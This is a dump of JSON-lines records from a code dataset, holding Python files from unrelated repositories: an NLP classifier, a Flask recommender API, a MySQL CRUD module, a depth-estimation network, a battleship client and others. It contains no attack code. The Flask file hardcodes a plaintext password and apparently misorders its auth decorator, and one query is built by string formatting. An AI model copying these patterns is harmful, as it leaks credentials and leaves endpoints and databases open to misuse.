4]]))\n","repo_name":"ruiwanguiuc/LeetCode","sub_path":"graph_valid_tree.py","file_name":"graph_valid_tree.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"73638582972","text":"import NLP_Scraping\nimport nltk\nfrom nltk.corpus import stopwords\nfrom nltk import word_tokenize\nfrom nltk import WordNetLemmatizer\nimport string\nimport random\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import train_test_split\nimport numpy as np\nimport pandas as pd\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom contextlib import closing\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver import Firefox\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.keys import Keys\nimport time\n#import urllib2\nimport urllib.request,urllib.parse,urllib.error\nimport re\nfrom bs4 import BeautifulSoup\nimport unicodedata\nfrom sklearn.externals import joblib as jb\n\n\n\ndata = pd.read_csv(r\"C:\\Users\\nauri\\Desktop\\ML proj\\Amazon_Unlocked_Mobile.csv\")\nX = data['Reviews'][:]\nY = data['Rating'][:]\n\nfor i in range(len(Y)):\n temp = Y[i]\n temp = int(temp)\n if temp >= 3:\n temp = 1\n elif temp < 3:\n temp = 
0\n Y[i] = temp\n\n\ndef preprocessing(text):\n \n # tokenize into words\n tokens = str(text).split()\n for i,word in enumerate(tokens):\n if (word in ['not','no'] or \"n't\" in word) and (i != len(tokens) - 1):\n tokens.append(\"not_\" + tokens[i+1])\n del tokens[i]\n del tokens[i+1]\n\n # remove stopwords\n stop = stopwords.words('english')\n tokens = [token for token in tokens if token not in stop]\n\n # remove words less than three letters\n tokens = [word for word in tokens if len(word) >= 3]\n\n # lower capitalization\n tokens = [word.lower() for word in tokens]\n\n # lemmatize\n lmtzr = WordNetLemmatizer()\n tokens = [lmtzr.lemmatize(word) for word in tokens]\n preprocessed_text= ' '.join(tokens)\n\n return preprocessed_text \n\nprint(\"Processing text data...\")\nfor i in range(len(X)):\n temp = X[i]\n X[i] = preprocessing(temp)\n\nprint(\"Splitting Dataset for training and testing...\")\nX_train, X_test, y_train, y_test = train_test_split(X, Y, test_size = 0.25, random_state = 0)\n\n \nvectorizer = TfidfVectorizer(max_features=2900)\ntrain_X=vectorizer.fit_transform(X_train)\ntest_X=vectorizer.transform(X_test)\n\n\nMNB = MultinomialNB()\n\nprint(\"Training classifier...\")\nMNB.fit(train_X, y_train)\n\njb.dump(MNB, 'pickled_model.pkl')\nprint(\"The model has been pickled for further testing...\")\n\npred = MNB.predict(test_X)\n\nprint(\"The accuracy of our classifier is as follows : \", accuracy_score(y_test,pred))\n\ndF_review = pd.read_csv(r\"C:\\Users\\nauri\\source\\repos\\NLP_Scraping\\NLP_Scraping\\Review(Content - Redmi Note 5 Pro).csv\")\nprint(\"Predicting Comment data from scraping...\")\nFtext = []\nfor i in range(dF_review.shape[0]):\n temp = dF_review['Review Content'][i]\n pred_data = preprocessing(temp)\n Ftext.append(pred_data)\n\ncamera_file = open(r\"Camera words.txt\", \"r\")\nfilter = camera_file.read().split('\\n')\n\nFtext_camera = []\nfor l in Ftext:\n camera_text = l.split(\".\")\n for c in camera_text:\n for w in filter:\n if w in c and c not in Ftext_camera:\n Ftext_camera.append(c)\n\nFtext=vectorizer.transform(Ftext)\nFtext_camera=vectorizer.transform(Ftext_camera)\n\npred_res = MNB.predict(Ftext)\npred_camera = MNB.predict(Ftext_camera)\nprint(\"The Predictions for each comment are as follows :-\")\nprint(pred_res)\nprint(len(pred_res))\nprint(\"The Predictions for all camera related comments are as follows :-\")\nprint(len(pred_camera))\n\nsum = 0\nsum1 = 0\nfor i in pred_res:\n sum = sum + i\nrating = sum/len(pred_res)\nrating = rating * 5\nprint (\"Rating out of 5 is :- \", rating)\nfor i in pred_camera:\n sum1 = sum1 + i\nrating1 = sum1/len(pred_camera)\nrating1 = rating1 * 5 \nprint (\"Rating out of 5 for camera is :- \", rating1)\n\n#total_neg = 0\n#total_pos = 0\n#for i in pred_res:\n# if i == 0:\n# total_neg = total_neg + 1\n# elif i == 1:\n# total_pos = total_pos + 1\n\n#total_neg1 = 0\n#total_pos1 = 0\n#for i in pred_camera:\n# if i == 0:\n# total_neg1 = total_neg1 + 1\n# elif i == 1:\n# total_pos1 = total_pos1 + 1\n#import matplotlib.pyplot as plt\n#objects = ['Positive','Negative']\n#y_pos = np.arange(len(objects))\n\n#plt.bar(y_pos,[total_pos,total_neg],alpha=0.5)\n#plt.xticks(y_pos,objects)\n#plt.ylabel('Number')\n#plt.title('Number of Postive and Negative 
Reviews')\n\n#plt.show()","repo_name":"Composer117/Mobile_reviewer","sub_path":"Sentiment_prog/Mobile_Reviewer.py","file_name":"Mobile_Reviewer.py","file_ext":"py","file_size_in_byte":4658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21840884014","text":"import os\nimport sys\nimport cv2\nimport subprocess\n\nimport string\nimport secrets\n\ndef pass_gen(size=12):\n chars = string.ascii_uppercase + string.ascii_lowercase + string.digits \\\n #+ '%&$#()'\n return ''.join(secrets.choice(chars) for x in range(size))\n\ndef compare_ext(src_ext, dst_ext):\n \"\"\"\n An error occurs because the extension conversion is not supported\n \"\"\"\n if not src_ext == dst_ext:\n return 1\n return 0\n\ndef open_image(dst_file_name):\n cmd = [\"open\", dst_file_name]\n res = subprocess.call(cmd)\n\n\"\"\"\n__all__ = [\"settings\"]\n\n\ndef get_user_email(user):\n email_field_name = get_user_email_field_name(user)\n return getattr(user, email_field_name, None)\n\n\ndef get_user_email_field_name(user):\n return user.get_email_field_name()\n\"\"\"\n \ndef compress_image(args):\n \"\"\"\n Image compression processing function\n \"\"\"\n channel = 1\n src_file_name = args.input\n dst_file_name = args.output\n\n # Compare extensions\n src_path, src_ext = os.path.splitext(src_file_name)\n dst_path, dst_ext = os.path.splitext(dst_file_name)\n\n if compare_ext(src_ext, dst_ext):\n print(\"[FAILED] : Invarid extensions\", src_ext, dst_ext)\n sys.exit(1)\n\n img = cv2.imread(src_file_name)\n\n (result, encimg) = cv2.imencode('.jpg', img, [\n int(cv2.IMWRITE_JPEG_QUALITY),\n int(args.quality)\n ])\n\n if result is False:\n return (1)\n\n dst = cv2.imdecode(encimg, channel)\n\n # Image writing process\n cv2.imwrite(dst_file_name, dst)\n\n if args.open:\n open_image(dst_file_name)\n\nurlpatterns = [\n url(\n r\"^o/(?P\\S+)/$\",\n views.ProviderAuthView.as_view(),\n name=\"provider-auth\",\n )\n]\n\nclass TokenStrategy:\n pass\n","repo_name":"ryuichi1208/ImgConversion","sub_path":"src/compress_image.py","file_name":"compress_image.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"44557471458","text":"#! 
/usr/bin/env python\n# from gevent import monkey\n# monkey.patch_all()\n\nimport os\nimport json\n\nfrom flask import Flask, request, jsonify\nfrom flasgger import Swagger\nfrom flask_httpauth import HTTPBasicAuth\n\n\napp = Flask(__name__, static_folder=os.path.join(os.getcwd(), 'static'))\napp.config['SWAGGER'] = {\n # set to True so instead of\n # $ref: '#/definitions/alert'\n # we get\n # $ref: '#/definitions/index_post_alert'\n 'prefix_ids': True\n}\nSwagger(app)\n\nAPP_ROOT = os.path.dirname(os.path.realpath(__file__))\n\n# AUTHENTICATION\nauth = HTTPBasicAuth()\nusers = {\n \"mtambos\": \"agtd%dfgkjhRE85$§XXC6\"\n}\n\n\n@auth.get_password\ndef get_pw(username):\n if username in users:\n return users.get(username)\n return None\n\n\n@app.before_request\ndef before_request():\n print(f\"Request received to {request.path}.\")\n\n\n@auth.login_required\n@app.route('/recommend', methods=['POST'])\ndef recommend():\n \"\"\"\n Given a document, returns a list of recommendations.\n ---\n tags:\n - recommend\n parameters:\n - in: body\n name: body\n schema:\n id: doc\n required:\n - content\n - num\n properties:\n content:\n type: string\n description: list of characteristics important to the user.\n num:\n type: integer\n description: number of recommendations to return.\n default: 10\n responses:\n 200:\n description: recommendations\n schema:\n type: array\n items:\n $ref: '#/definitions/Recommendation'\n \"\"\"\n from recommender import content_engine\n content = request.json['content']\n num_predictions = request.json.get('num', 10)\n return jsonify(content_engine.recommend(content, num_predictions))\n\n\n@auth.login_required\n@app.route('/train//', methods=['GET'])\ndef train(data_url):\n \"\"\"\n Train the recommender with the given data.\n ---\n tags:\n - train\n parameters:\n - name: data_url\n in: path\n type: string\n required: true\n responses:\n 200:\n description: OK if successfully finished.\n type: string\n \"\"\"\n from recommender import content_engine\n content_engine.train(data_url)\n return \"OK\"\n\n\n# API ENDPOINTS\n@auth.login_required\n@app.route('/')\ndef index():\n status_message = json.dumps({'status': \"200\"})\n return str(status_message)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n\n","repo_name":"mtambos/sample_recommender","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"9045901764","text":"class myclass:\n\tdef __init__(self, *ar):\n\t\tmylist = []\n\n\t\tfor n in ar:\n\t\t\tmylist.append(n)\n\t\t\n\t\tself.mylist = mylist\n\n\tdef sumdata(self):\n\t\tsum_result = 0\n\n\t\tfor n in self.mylist:\n\t\t\tsum_result += n\n\n\t\treturn sum_result\n\n\nb = myclass(4, 2, 3)\nprint(b.mylist)\nprint(b.sumdata())","repo_name":"RyanInWinter/python1018","sub_path":"3일차/calc.py","file_name":"calc.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"20107230254","text":"#!/usr/bin/python3\n\n# 将所有hostname 去重集合于 hostname数据表并填充标识\n# 数据来源: pro2与hostname/res目录\n# 只提取与starlink相关的starlinkisp.net与undefined...\n# cat ../hostname/res/hostname* | python3 -u hostinfo.py\n\n\nfrom sys import path\npath.append(r\"/home/ubuntu/Academic/starlink\")\n\nfrom utility import *\nfrom typing import *\n\n\ndef read_stdin() -> List:\n \"\"\" \"\"\"\n res = []\n while True:\n try:\n text = input()\n hostname = text.split(' ')[1]\n 
res.append(hostname)\n except:\n break\n \n res = list(set(res))\n try:\n res.remove(None)\n except:\n pass\n \n return res\n\n\ndef read_pro2(database: starlink_db, table='pro2'):\n \"\"\" \n null数据返回 None\n\n \"\"\"\n query = \"SELECT hostname from {}\".format(table)\n res = database.select(query)\n\n res = [ele[0] for ele in res]\n res = list(set(res))\n try:\n res.remove('')\n res.remove(None)\n except:\n pass\n\n return res\n\n\ndef parse(hostname) -> str:\n \"\"\"\n \n \"\"\"\n\n if 'customer' in hostname:\n if 'mc' in hostname:\n return 'customer-mc'\n if 'pop' in hostname:\n return 'customer-pop'\n \n if 'undefined' in hostname:\n return 'undefined'\n \n return ''\n\n\ndef upload(hostname, id, database: starlink_db, table='hostname'):\n \"\"\" \"\"\"\n query_base = \"INSERT IGNORE into {} \\\n (identifier, hostname) values \\\n ('{}', '{}')\"\n query = query_base.format(table, id, hostname)\n\n try:\n database.insert(query)\n except:\n print(query)\n # 继续运行,抛弃错误数据\n # exit(1)\n\n\ndef main():\n database = starlink_db()\n\n stdin_list = read_stdin()\n pro2_list = read_pro2(database)\n\n hostnames = stdin_list + pro2_list\n hostnames = list(set(hostnames))\n\n print('--- num of hostnames:', len(hostnames))\n\n hostname = 'undefined.hostname.localhost'\n id = parse(hostname)\n upload(hostname, id ,database)\n\n for hostname in hostnames:\n id = parse(hostname)\n upload(hostname, id ,database)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"lazypip/starCollect","sub_path":"lookup/hostname.py","file_name":"hostname.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37370523140","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\n# EfficientNet B5\nclass Encoder(nn.Module):\n def __init__(self):\n super(Encoder, self).__init__()\n basemodel_name = 'tf_efficientnet_b5_ap'\n basemodel = torch.hub.load('rwightman/gen-efficientnet-pytorch', basemodel_name, pretrained=True)\n # Remove last layer\n basemodel.global_pool = nn.Identity()\n basemodel.classifier = nn.Identity()\n self.original_model = basemodel\n\n def forward(self, x):\n features = [x]\n for k, v in self.original_model._modules.items():\n if (k == 'blocks'):\n for ki, vi in v._modules.items():\n features.append(vi(features[-1]))\n else:\n features.append(v(features[-1]))\n return features\n\n\n# Decoder block with batch norm\nclass UpSampleBN(nn.Module):\n def __init__(self, skip_input, output_features):\n super(UpSampleBN, self).__init__()\n self._net = nn.Sequential(nn.Conv2d(skip_input, output_features, kernel_size=3, stride=1, padding=1),\n nn.BatchNorm2d(output_features),\n nn.LeakyReLU(),\n nn.Conv2d(output_features, output_features, kernel_size=3, stride=1, padding=1),\n nn.BatchNorm2d(output_features),\n nn.LeakyReLU())\n\n def forward(self, x, concat_with):\n up_x = F.interpolate(x, size=[concat_with.size(2), concat_with.size(3)], mode='bilinear', align_corners=True)\n f = torch.cat([up_x, concat_with], dim=1)\n return self._net(f)\n\n\n# Decoder block with group norm + weight standardization\nclass UpSampleGN(nn.Module):\n def __init__(self, skip_input, output_features):\n super(UpSampleGN, self).__init__()\n self._net = nn.Sequential(Conv2d(skip_input, output_features, kernel_size=3, stride=1, padding=1),\n nn.GroupNorm(8, output_features),\n nn.LeakyReLU(),\n Conv2d(output_features, output_features, kernel_size=3, stride=1, padding=1),\n nn.GroupNorm(8, output_features),\n 
nn.LeakyReLU())\n\n def forward(self, x, concat_with):\n up_x = F.interpolate(x, size=[concat_with.size(2), concat_with.size(3)], mode='bilinear', align_corners=True)\n f = torch.cat([up_x, concat_with], dim=1)\n return self._net(f)\n\n\n# Conv2d with weight standardization\nclass Conv2d(nn.Conv2d):\n def __init__(self, in_channels, out_channels, kernel_size, stride=1,\n padding=0, dilation=1, groups=1, bias=True):\n super(Conv2d, self).__init__(in_channels, out_channels, kernel_size, stride,\n padding, dilation, groups, bias)\n\n def forward(self, x):\n weight = self.weight\n weight_mean = weight.mean(dim=1, keepdim=True).mean(dim=2,\n keepdim=True).mean(dim=3, keepdim=True)\n weight = weight - weight_mean\n std = weight.view(weight.size(0), -1).std(dim=1).view(-1, 1, 1, 1) + 1e-5\n weight = weight / std.expand_as(weight)\n return F.conv2d(x, weight, self.bias, self.stride,\n self.padding, self.dilation, self.groups)\n\n\n# Upsample depth via bilinear upsampling\ndef upsample_depth_via_bilinear(depth, up_mask, downsample_ratio):\n return F.interpolate(depth, scale_factor=downsample_ratio, mode='bilinear', align_corners=True)\n\n\n# Upsample depth via learned upsampling\ndef upsample_depth_via_mask(depth, up_mask, downsample_ratio):\n # depth: low-resolution depth (B, 2, H, W)\n # up_mask: (B, 9*k*k, H, W)\n k = downsample_ratio\n\n N, o_dim, H, W = depth.shape\n up_mask = up_mask.view(N, 1, 9, k, k, H, W)\n up_mask = torch.softmax(up_mask, dim=2) # (B, 1, 9, k, k, H, W)\n\n up_depth = F.unfold(depth, [3, 3], padding=1) # (B, 2, H, W) -> (B, 2 X 3*3, H*W)\n up_depth = up_depth.view(N, o_dim, 9, 1, 1, H, W) # (B, 2, 3*3, 1, 1, H, W)\n up_depth = torch.sum(up_mask * up_depth, dim=2) # (B, 2, k, k, H, W)\n\n up_depth = up_depth.permute(0, 1, 4, 2, 5, 3) # (B, 2, H, k, W, k)\n return up_depth.reshape(N, o_dim, k*H, k*W) # (B, 2, kH, kW)\n\n\n# Decoder\nclass Decoder(nn.Module):\n def __init__(self, num_classes, downsample_ratio, learned_upsampling, BN, dnet):\n super(Decoder, self).__init__()\n features = 2048\n bottleneck_features = 2048\n self.downsample_ratio = downsample_ratio\n self.dnet = dnet\n\n if BN:\n print('using BatchNorm')\n UpSample = UpSampleBN\n else:\n print('using GroupNorm')\n UpSample = UpSampleGN\n\n # decoder architecture\n if self.downsample_ratio == 8:\n i_dim = features // 4\n h_dim = 128\n self.conv2 = nn.Conv2d(bottleneck_features, features, kernel_size=1, stride=1, padding=0)\n self.up1 = UpSample(skip_input=features // 1 + 176, output_features=features // 2)\n self.up2 = UpSample(skip_input=features // 2 + 64, output_features=features // 4)\n\n elif self.downsample_ratio == 4:\n i_dim = features // 8\n h_dim = 128\n self.conv2 = nn.Conv2d(bottleneck_features, features, kernel_size=1, stride=1, padding=0)\n self.up1 = UpSample(skip_input=features // 1 + 176, output_features=features // 2)\n self.up2 = UpSample(skip_input=features // 2 + 64, output_features=features // 4)\n self.up3 = UpSample(skip_input=features // 4 + 40, output_features=features // 8)\n\n elif self.downsample_ratio == 2:\n i_dim = features // 16\n h_dim = 128\n self.conv2 = nn.Conv2d(bottleneck_features, features, kernel_size=1, stride=1, padding=0)\n self.up1 = UpSample(skip_input=features // 1 + 176, output_features=features // 2)\n self.up2 = UpSample(skip_input=features // 2 + 64, output_features=features // 4)\n self.up3 = UpSample(skip_input=features // 4 + 40, output_features=features // 8)\n self.up4 = UpSample(skip_input=features // 8 + 24, output_features=features // 16)\n\n else:\n 
raise Exception('downsample ratio invalid')\n\n # depth prediction \n self.depth_head = nn.Sequential(\n nn.Conv2d(i_dim, h_dim, 3, padding=1), nn.ReLU(inplace=True),\n nn.Conv2d(h_dim, h_dim, 1), nn.ReLU(inplace=True),\n nn.Conv2d(h_dim, num_classes, 1),\n )\n\n # upsampling\n if learned_upsampling:\n self.mask_head = nn.Sequential(\n nn.Conv2d(i_dim, h_dim, 3, padding=1), nn.ReLU(inplace=True),\n nn.Conv2d(h_dim, h_dim, 1), nn.ReLU(inplace=True),\n nn.Conv2d(h_dim, 9 * self.downsample_ratio * self.downsample_ratio, 1)\n )\n self.upsample_depth = upsample_depth_via_mask\n else:\n self.mask_head = lambda a: None\n self.upsample_depth = upsample_depth_via_bilinear\n\n def forward(self, features):\n x_block0, x_block1, x_block2, x_block3, x_block4 = features[4], features[5], features[6], features[8], features[11]\n\n if self.downsample_ratio == 8:\n x_d0 = self.conv2(x_block4)\n x_d1 = self.up1(x_d0, x_block3)\n x_feat = self.up2(x_d1, x_block2)\n elif self.downsample_ratio == 4:\n x_d0 = self.conv2(x_block4)\n x_d1 = self.up1(x_d0, x_block3)\n x_d2 = self.up2(x_d1, x_block2)\n x_feat = self.up3(x_d2, x_block1)\n elif self.downsample_ratio == 2:\n x_d0 = self.conv2(x_block4)\n x_d1 = self.up1(x_d0, x_block3)\n x_d2 = self.up2(x_d1, x_block2)\n x_d3 = self.up3(x_d2, x_block1)\n x_feat = self.up4(x_d3, x_block0)\n else:\n raise Exception('downsample ratio invalid')\n\n depth = self.depth_head(x_feat)\n\n if self.dnet:\n mask = self.mask_head(x_feat)\n up_depth = self.upsample_depth(depth, mask, self.downsample_ratio)\n return up_depth\n else:\n # if used as a part of MaGNet, do not upsample and also return the feature-map\n return depth, x_feat\n\n\n# D-Net\nclass DenseDepth(nn.Module):\n def __init__(self, n_bins, downsample_ratio, learned_upsampling, BN=True, dnet=True):\n super(DenseDepth, self).__init__()\n self.encoder = Encoder()\n self.decoder = Decoder(n_bins, downsample_ratio, learned_upsampling, BN, dnet)\n\n def forward(self, x):\n return self.decoder(self.encoder(x))\n\n def get_1x_lr_params(self): # lr/10 learning rate\n return self.encoder.parameters()\n\n def get_10x_lr_params(self): # lr learning rate\n return self.decoder.parameters()\n\n","repo_name":"baegwangbin/MaGNet","sub_path":"models/submodules/D_dense_depth.py","file_name":"D_dense_depth.py","file_ext":"py","file_size_in_byte":8952,"program_lang":"python","lang":"en","doc_type":"code","stars":178,"dataset":"github-code","pt":"78"} +{"seq_id":"75188672891","text":"import os\nimport inspect\nimport sys\n\ninit_file = open('linklib\\\\__init__.py')\nutils_file = open('linklib\\\\utils.py')\nconnects_file = open(\"linklib\\\\connects.py\")\n\nprint('copyng files')\nfiles = {\n \"init\":init_file.read(),\n \"utils\":utils_file.read(),\n \"connects\":connects_file.read()\n}\n\ninit_file.close()\nutils_file.close()\nconnects_file.close()\n\ndef get_libdir():\n if not('LIB' in os.environ):\n os_dir = inspect.getfile(os)\n os_dir += '\\\\site-packages\\\\'\n return os_dir \n else:\n return os.environ['LIB'] + '\\\\site-packages\\\\'\n\nprint('installing...')\ndir = f'{get_libdir()}\\\\linklib'\nos.makedirs(f'{dir}',exist_ok=True)\ninit_file = open(dir + '\\\\__init__.py','w')\nutils_file = open(dir + '\\\\utils.py','w')\nconnects_file = open(dir + 
'\\\\connects.py','w')\n\nprint('extracting...')\ninit_file.write(files['init'])\nutils_file.write(files['utils'])\nconnects_file.write(files['connects'])\n\nprint('succes!!!')\n\n","repo_name":"Venitocrack/linklib","sub_path":"install.py","file_name":"install.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12522592201","text":"#############################\n# Author(s): Josh Cullings #\n# James Eaton #\n# #\n# Date: 9/23/2019 #\n#########/###################\n\nimport socket as sc\nimport sys\nimport time\n\ndef player(host, port, x, y): # i.e. the client\n socket = sc.socket()\n socket.connect((host, port))\n\n socket.send(('200 x='+str(x)+'&y='+str(y)).encode())\n\n result = socket.recv(1024).decode()\n print(result)\n \n with open(\"opponent_board.txt\") as f:\n opponent_board = f.read().splitlines()\n \n file = []\n newFile = []\n for i in range(0,10):\n for j in range (0,10):\n newFile.append(opponent_board[i][j])\n\n file.append(newFile)\n newFile = []\n\n if(result != '400'):\n x = int(x)\n y = int(y)\n opponent_board = file\n \n opponent_out = open(\"opponent_board.txt\", 'w')\n\n if(len(result) > 5):\n if(result[8] == '1'):\n opponent_board[x][y] = 'X'\n\n elif(result[8] == '0'):\n opponent_board[x][y] = 'O'\n\n for i in range(0,10):\n opponent_out.write(''.join(opponent_board[i]))\n opponent_out.write(\"\\n\")\n\n socket.close()\n \n print('\\n 0 1 2 3 4 5 6 7 8 9')\n for i in range(0,10):\n print(str(i)+' '+str(' '.join(opponent_board[i])))\n\nif __name__ == '__main__':\n try:\n host = str(sys.argv[1])\n port = int(sys.argv[2])\n x = sys.argv[3]\n y = sys.argv[4]\n \n player(host, port, x, y)\n except:\n print(\"Please enter the correct parameters\")\n\n#########################################################################################################\n# References: ` #\n# https://medium.com/podiihq/networking-how-to-communicate-between-two-python-programs-abd58b97390a #\n# #\n#########################################################################################################\n","repo_name":"cullingsj/Networks","sub_path":"PA1/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12833101660","text":"def d_mi_m(d_mil): #função que converte milhas em metros\r\n d_m = d_mil* 1610 #equação para converter milhas em metros\r\n return d_m #comando para retornar o valor em metros\r\n\r\ndef d_m_mi(d_m): #função para converter metros em milhas\r\n d_mil = d_m / 1610\r\n return d_mil\r\n\r\ndef t_h_s(h): #função para converter horas em segundos\r\n t_s = t_h * 3600\r\n return t_s\r\n\r\ndef t_s_h(s): #função que converte segundos em horas\r\n t_h = t_s/3600\r\n return t_h\r\n\r\n\r\n#Exercício da aula 1\r\n\r\nt = 43.5 * 60 #tempo dado em segundos\r\nd = 10*1000 #distância dada em metros\r\n\r\nd2_mil = d_m_mi(d) #aplica a função na variável d\r\nt_h2 = t_s_h(t) #aplica a função na variável t\r\n\r\nt_mil_h = (t_h2) / (d2_mil) #equação para o tempo médio por milha em horas\r\nv_mil_h = 1/t_mil_h #equação para achar a velocidade média em milhas por hora\r\n\r\nprint('A velocidade média em milhas por hora é:', v_mil_h)\r\nprint('O tempo médio por milha em hora é:', t_mil_h)\r\n\r\n\r\n#Exercício da aula 3\r\n\r\nd3_mil = 4 #distância dada em milhas\r\nt_h3 = 0.5 #tempo dado em horas\r\n\r\nd2_m = d_mi_m(d3_mil) #aplica a função na variável 
d3_mil\r\nd_km = d2_m / 1000 #transforma d2_m em km\r\n\r\nv_med = d_km / t_h3 #velocidade média em km/h\r\nt_med = 1/ v_med #tempo médio por km em horas\r\n\r\nprint('A velocidade média em km/h é:', v_med)\r\nprint('O tempo médio por km em horas é:', t_med)\r\n","repo_name":"AnnaPaulaM/Exerc-cios-Python","sub_path":"Exercício_4.py","file_name":"Exercício_4.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"21554853623","text":"import mysql.connector\nimport os\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nmydb = mysql.connector.connect(\n host=os.getenv(\"HOST_DB\"),\n user=os.getenv(\"USER_DB\"),\n password=os.getenv(\"PASS_DB\"),\n database=os.getenv(\"DATABASE\")\n)\n\ncursor = mydb.cursor()\n\ndef checkExistsTable():\n cursor.execute(\"SELECT * FROM information_schema.tables WHERE table_name = 'products'\")\n value = cursor.fetchall()\n if(len(value) < 1):\n cursor.execute(\"CREATE TABLE products(id INT PRIMARY KEY AUTO_INCREMENT, name VARCHAR(255) NOT NULL, section VARCHAR(255) NOT NULL, price DECIMAL(6,2) NOT NULL, available INT(4) DEFAULT 1)\")\n\ndef addNewProduct(name, section, price, available):\n cursor.execute(\"INSERT INTO products (name, section, price, available) VALUES(%s, %s, %s, %s)\", (name, section, price, available))\n mydb.commit()\n return cursor.lastrowid\n\ndef getProducts(id):\n if id > 0:\n cursor.execute(\"SELECT JSON_OBJECT('id', id, 'name', name, 'section', section, 'price', price, 'available', available) FROM products WHERE id = {}\".format(id))\n return cursor.fetchone()\n else:\n cursor.execute(\"SELECT JSON_OBJECT('id', id, 'name', name, 'section', section, 'price', price, 'available', available) FROM products\")\n return cursor.fetchall()\n\ndef delProduct(id):\n cursor.execute(\"DELETE FROM products WHERE id = %s\", (id,))\n mydb.commit()\n\ndef updateProduct(id, new):\n if new['name']:\n cursor.execute(\"UPDATE products SET name = %s WHERE id = %s\", (new['name'], id,))\n if new['section']:\n cursor.execute(\"UPDATE products SET section = %s WHERE id = %s\", (new['section'], id,))\n if new['price']:\n cursor.execute(\"UPDATE products SET price = %s WHERE id = %s\", (new['price'], id,))\n if new['available']:\n cursor.execute(\"UPDATE products SET available = %s WHERE id = %s\", (new['available'], id,))\n mydb.commit()","repo_name":"szHeron/CRUD-API","sub_path":"dbmanager.py","file_name":"dbmanager.py","file_ext":"py","file_size_in_byte":1840,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"2713176401","text":"#Embedded file name: dropbox/win32/psapi.py\nimport ctypes\nfrom ctypes import c_void_p, POINTER\nfrom ctypes.wintypes import DWORD, BOOL, HANDLE\nfrom dropbox.debugging import ReprStructure\nfrom .kernel32 import GetLastError, win_strerror\nSIZE_T = c_void_p\n\nclass PROCESS_MEMORY_COUNTERS(ReprStructure):\n _fields_ = [('cb', DWORD),\n ('PageFaultCount', DWORD),\n ('PeakWorkingSetSize', SIZE_T),\n ('WorkingSetSize', SIZE_T),\n ('QuotaPeakPagedPoolUsage', SIZE_T),\n ('QuotaPagedPoolUsage', SIZE_T),\n ('QuotaPeakNonPagedPoolUsage', SIZE_T),\n ('QuotaNonPagedPoolUsage', SIZE_T),\n ('PagefileUsage', SIZE_T),\n ('PeakPagefileUsage', SIZE_T)]\n\n\n_psapi = ctypes.windll.psapi\ntry:\n GetProcessMemoryInfo = _psapi.GetProcessMemoryInfo\n GetProcessMemoryInfo.argtypes = [HANDLE, POINTER(PROCESS_MEMORY_COUNTERS), DWORD]\n GetProcessMemoryInfo.restype = BOOL\nexcept:\n pass\n\ntry:\n 
_EnumProcesses = _psapi.EnumProcesses\n _EnumProcesses.argtypes = [POINTER(DWORD), DWORD, POINTER(DWORD)]\n _EnumProcesses.restype = BOOL\nexcept:\n pass\n\ndef EnumProcesses():\n cur_pids = 100\n size_of_dword = ctypes.sizeof(DWORD)\n while True:\n pids = (DWORD * cur_pids)()\n bytes_allocated = cur_pids * size_of_dword\n bytes_returned = DWORD(0)\n if not _EnumProcesses(pids, bytes_allocated, ctypes.byref(bytes_returned)):\n win_errno = GetLastError()\n raise WindowsError(win_errno, win_strerror(win_errno))\n if bytes_returned.value != bytes_allocated:\n break\n cur_pids *= 2\n\n return pids[:bytes_returned.value / size_of_dword]\n","repo_name":"bizonix/DropBoxLibrarySRC","sub_path":"pyc_decrypted/latest/dropbox/win32/psapi.py","file_name":"psapi.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"78"} +{"seq_id":"73969894330","text":"#Coding project #1 Goal: make a decent keyboard buying simulator project with 300 lines of code.\r\n\r\n#imports from python libraries or other files inside this project\r\nimport random\r\nimport time\r\n\r\nswitches = {\r\n 'Linear': ['Cherry Reds', 'Banana Splits', 'Tangerines', 'Alpacas', 'NovelKey Creams', 'Tealios', 'Durock Linears'], \r\n 'Tactile': ['Cherry Browns', 'Kiwis', 'Holy Pandas', 'Boba 4UT', 'Zealios', 'Durock Tactiles'],\r\n'Silents': ['Roseilos', 'Cherry MX Silent', 'Zilents', 'Silent Alpacaas']\r\n}\r\n\r\nkeyboard_name_list = []\r\nclass Keyboard(object):\r\n def __init__(self, layout, pcb, plate, switches):\r\n self.layout = layout\r\n self.pcb = pcb\r\n self.plate = plate\r\n self.switches = switches\r\n \r\n def __repr__(self):\r\n return ('Important tools in a keyboard: %ss, the %s, the %s, and most importantly the %s and how 